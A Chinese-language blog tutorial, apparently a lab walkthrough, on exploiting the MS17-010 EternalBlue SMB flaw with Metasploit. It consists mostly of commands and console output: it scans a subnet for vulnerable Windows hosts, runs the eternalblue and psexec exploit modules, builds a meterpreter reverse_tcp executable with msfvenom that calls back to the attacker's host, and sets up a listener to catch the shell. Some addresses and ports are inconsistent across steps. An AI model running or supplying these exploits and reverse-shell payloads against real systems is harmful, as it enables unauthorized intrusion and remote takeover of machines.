Metasploit-ms17-010永恆之藍(X86使用)

Metasploit正題

搜索相關的漏洞插件

msf > search 17-010

 


搜索到了4個相關的插件:

 

  1. auxiliary/admin/smb/ms17_010_command
  2. auxiliary/scanner/smb/smb_ms17_010
  3. exploit/windows/smb/ms17_010_eternalblue
  4. exploit/windows/smb/ms17_010_psexec

其中前2個插件是auxiliary目錄下的,屬於輔助驗證程序。
3和4是exploit目錄下的,這纔是我們重點研究的對象~

使用輔助驗證插件測試

這裏就拿auxiliary/scanner/smb/smb_ms17_010這個掃描插件來測試,這個插件的作用是掃描可能含有ms17-010漏洞的服務器。

msf > use auxiliary/scanner/smb/smb_ms17_010

msf auxiliary(scanner/smb/smb_ms17_010) > show options

Module options (auxiliary/scanner/smb/smb_ms17_010):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   CHECK_ARCH  true             yes       Check for architecture on vulnerable hosts
   CHECK_DOPU  true             yes       Check for DOUBLEPULSAR on vulnerable hosts
   RHOSTS                       yes       The target address range or CIDR identifier
   RPORT       445              yes       The SMB service port (TCP)
   SMBDomain   .                no        The Windows domain to use for authentication
   SMBPass                      no        The password for the specified username
   SMBUser                      no        The username to authenticate as
   THREADS     1                yes       The number of concurrent threads

這裏的show options是顯示這個插件相關的一些參數,在Required這一欄下面是yes的表示必填參數,這裏面還剩RHOSTS這個參數沒有填寫即目標網段。下面設置一個目標網段,準備進行掃描測試:

msf auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 10.10.55.1/24
RHOSTS => 10.10.55.1/24

設置掃描線程,插件默認是1,這裏設置爲50

msf auxiliary(scanner/smb/smb_ms17_010) > set THREADS 50
THREADS => 50

可以執行show options查看自己剛剛填寫的參數信息:


開始執行插件:

msf auxiliary(scanner/smb/smb_ms17_010) > run

或者

msf auxiliary(scanner/smb/smb_ms17_010) > exploit

可以看到掃描出很多含有漏洞的主機了:

 

使用exploit模塊來進行攻擊測試

exploit/windows/smb/ms17_010_eternalblue

msf > use exploit/windows/smb/ms17_010_eternalblue

msf exploit(windows/smb/ms17_010_eternalblue) > run

exploit成功~~

 

exploit/windows/smb/ms17_010_psexec

msf > use exploit/windows/smb/ms17_010_psexec

msf exploit(windows/smb/ms17_010_psexec) > set RHOST 10.10.55.174
RHOST => 10.10.55.174

msf exploit(windows/smb/ms17_010_psexec) > run

失敗~~

msf exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.101.177.185:4444
[*] 10.10.55.174:445 - Target OS: Windows 7 Ultimate 7601 Service Pack 1
[-] 10.10.55.174:445 - Unable to find accessible named pipe!
[*] Exploit completed, but no session was created.

黑客組織 Shadow Brokers 公佈了美國國家安全局 NSA 的內部黑客工具和漏洞利用代碼,包括三大工具 EternalChampion、EternalRomance 和 EternalSynergy,近日一位安全研究人員 Sean Dillon(RiskSense) 改良了這三大黑客工具的源代碼,使其適用於 Windows 2000 之後 20 年間的所有微軟操作系統,包括 32 位和 64 位版本。

這裏我隨便測試了沒有成功,可能是這裏我測試的win7版本有點不一樣,和官方介紹的所有版本略微有點不一樣~~不過在測試Server 08 R2版本的時候執行效率很高,可以很快拿到反彈的shell。所以具體改良了哪些建議實際動手去測試一番。

 

msf簡單反彈shell模板

kali操作機器的ip地址是:10.101.177.185,將shell會話轉到kali的6666端口上。

生成payload

payload生成有32位和64位,所以生成的時候得明確目標系統的位數,否則運行或者拿到會話的時候回GG,服務器那邊彈出停止響應的運行框。

root@kali:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.101.177.185 LPORT=6666 -f exe > shell.exe

 


然後把生成的shell.exe拷貝到Windows下面,準備運行~

32位payload的生成語句就是windows/meterpreter/reverse_tcp去掉x64

監聽shell會話

msf > use exploit/multi/handler
msf > set LHOST 10.0.0.103
msf > set LPORT 6666
msf > set PAYLOAD windows/x64/meterpreter/reverse_tcp
msf > exploit

[*] Started reverse TCP handler on 10.101.177.185:6666

然後msf就開始監聽本機的666的端口了。

 

運行shell.exe

這個時候在windows下點擊之前生成的shell.exe,msf這裏會劫持到會話。

 

32位系統,這裏做如下調整:set PAYLOAD windows/meterpreter/reverse_tcp去掉x64

meterpreter漢字亂碼問題

成因

Linux下面漢字默認是UTF-8編碼
Windows下漢字使用的是GBK系列編碼

解決方案

Kali下先勾選GBK編碼


然後將終端臨時設置爲GBK系列編碼即可。

 

效果對比

msf亂碼

 

msf漢字正常

 

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章